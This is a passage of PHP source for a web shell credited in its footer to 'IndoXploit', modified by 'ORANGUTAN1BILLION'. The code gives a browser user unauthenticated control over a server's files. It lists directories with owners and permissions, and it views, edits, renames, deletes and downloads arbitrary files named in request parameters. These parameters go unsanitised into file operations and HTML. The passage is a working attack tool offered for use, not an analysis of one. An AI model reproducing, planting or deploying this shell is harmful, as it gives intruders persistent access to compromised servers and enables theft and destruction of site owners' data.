1979.     echo "Filename: <font color=white>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
1980.     echo "<form method='post'>
1981.     <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
1982.     <input type='submit' value='Save' name='save' style='width: 500px;'>
1983.     </form>";
1984. } elseif($_GET['act'] == 'rename') {
1985.     if($_POST['do_rename']) {
1986.         $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
1987.         if($rename) {
1988.             $act = "<script>window.location='?dir=".$dir."';</script>";
1989.         } else {
1990.             $act = "<font color=white>Permission denied</font>";
1991.         }
1992.     echo "".$act."<br>";
1993.     }
1994.     echo "Filename: <font color=white>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
1995.     echo "<form method='post'>
1996.     <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
1997.     <input type='submit' name='do_rename' value='rename'>
1998.     </form>";
1999. } elseif($_GET['act'] == 'delete') {
2000.     $delete = unlink($_GET['file']);
2001.     if($delete) {
2002.         $act = "<script>window.location='?dir=".$dir."';</script>";
2003.     } else {
2004.         $act = "<font color=white>Permission denied</font>";
2005.     }
2006.     echo $act;
2007. } else {
2008.     if(is_dir($dir) === true) {
2009.         if(!is_readable($dir)) {
2010.             echo "<font color=white>Can't open directory. ( not readable )</font>";
2011.         } else {
2012.             echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
2013.             <tr>
2014.             <th class="th_home"><center><font color=white>NAME</font></center></th>
2015.             <th class="th_home"><center><font color=white>TYPE</font></center></th>
2016.             <th class="th_home"><center><font color=white>SIZE</font></center></th>
2017.             <th class="th_home"><center><font color=white>LAST MODIFIED</font></center></th>
2018.             <th class="th_home"><center><font color=white>OWNER/GROUP</font></center></th>
2019.             <th class="th_home"><center><font color=white>PERMISSION</font></center></th>
2020.             <th class="th_home"><center><font color=white>ACTION</font></center></th>
2021.             </tr>';
2022.             $scandir = scandir($dir);
2023.             foreach($scandir as $dirx) {
2024.                 $dtype = filetype("$dir/$dirx");
2025.                 $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
2026.                 if(function_exists('posix_getpwuid')) {
2027.                     $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
2028.                     $downer = $downer['name'];
2029.                 } else {
2030.                     //$downer = $uid;
2031.                     $downer = fileowner("$dir/$dirx");
2032.                 }
2033.                 if(function_exists('posix_getgrgid')) {
2034.                     $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
2035.                     $dgrp = $dgrp['name'];
2036.                 } else {
2037.                     $dgrp = filegroup("$dir/$dirx");
2038.                 }
2039.                 if(!is_dir("$dir/$dirx")) continue;
2040.                 if($dirx === '..') {
2041.                     $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
2042.                 } elseif($dirx === '.') {
2043.                     $href = "<a href='?dir=$dir'>$dirx</a>";
2044.                 } else {
2045.                     $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
2046.                 }
2047.                 if($dirx === '.' || $dirx === '..') {
2048.                     $act_dir = "<a href='?act=newfile&dir=$dir'>Newfile</a> | <a href='?act=newfolder&dir=$dir'>Newfolder</a>";
2049.                     } else {
2050.                     $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>Rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>Delete</a>";
2051.                 }
2052.                 echo "<tr>";
2053.                 echo "<td class='td_home'><font color=white><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</font></td>";
2054.                 echo "<td class='td_home'><center><font color=white>$dtype</font></center></td>";
2055.                 echo "<td class='td_home'><center><font color=white>-</font></center></th></td>";
2056.                 echo "<td class='td_home'><center><font color=white>$dtime</font></center></td>";
2057.                 echo "<td class='td_home'><center><font color=white>$downer/$dgrp</font></center></td>";
2058.                 echo "<td class='td_home'><center><font color=white>".w("$dir/$dirx",perms("$dir/$dirx"))."</font></center></td>";
2059.                 echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
2060.                 echo "</tr>";
2061.             }
2062.         }
2063.     } else {
2064.         echo "<font color=white>Can't open directory.</font>";
2065.     }
2066.         foreach($scandir as $file) {
2067.             $ftype = filetype("$dir/$file");
2068.             $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
2069.             $size = filesize("$dir/$file")/1024;
2070.             $size = round($size,3);
2071.             if(function_exists('posix_getpwuid')) {
2072.                 $fowner = @posix_getpwuid(fileowner("$dir/$file"));
2073.                 $fowner = $fowner['name'];
2074.             } else {
2075.                 //$downer = $uid;
2076.                 $fowner = fileowner("$dir/$file");
2077.             }
2078.             if(function_exists('posix_getgrgid')) {
2079.                 $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
2080.                 $fgrp = $fgrp['name'];
2081.             } else {
2082.                 $fgrp = filegroup("$dir/$file");
2083.             }
2084.             if($size > 1024) {
2085.                 $size = round($size/1024,2). 'MB';
2086.             } else {
2087.                 $size = $size. 'KB';
2088.             }
2089.             if(!is_file("$dir/$file")) continue;
2090.             echo "<tr>";
2091.             echo "<td class='td_home'><font color=white><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</font></a></td>";
2092.             echo "<td class='td_home'><center><font color=white>$ftype</font></center></td>";
2093.             echo "<td class='td_home'><center><font color=white>$size</font></center></td>";
2094.             echo "<td class='td_home'><center><font color=white>$ftime</font></center></td>";
2095.             echo "<td class='td_home'><center><font color=white>$fowner/$fgrp</font></center></td>";
2096.             echo "<td class='td_home'><center><font color=white>".w("$dir/$file",perms("$dir/$file"))."</font></center></td>";
2097.             echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>Edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>Rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>Delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>Download</a></td>";
2098.             echo "</tr>";
2099.         }
2100.         echo "</table>";
2101.         if(!is_readable($dir)) {
2102.             //
2103.         } else {
2104.             echo "<p align=center><font color=white>Shell by IndoXploit - Modified by ORANGUTAN1BILLION</font></p>";
2105.         }
2106. }
2107. ?>
2108. <img src="http://cur.cursors-4u.net/cursor.png" style="position:absolute; top: 0px; right: 0px;"><!--Cursor-->
2109. </html>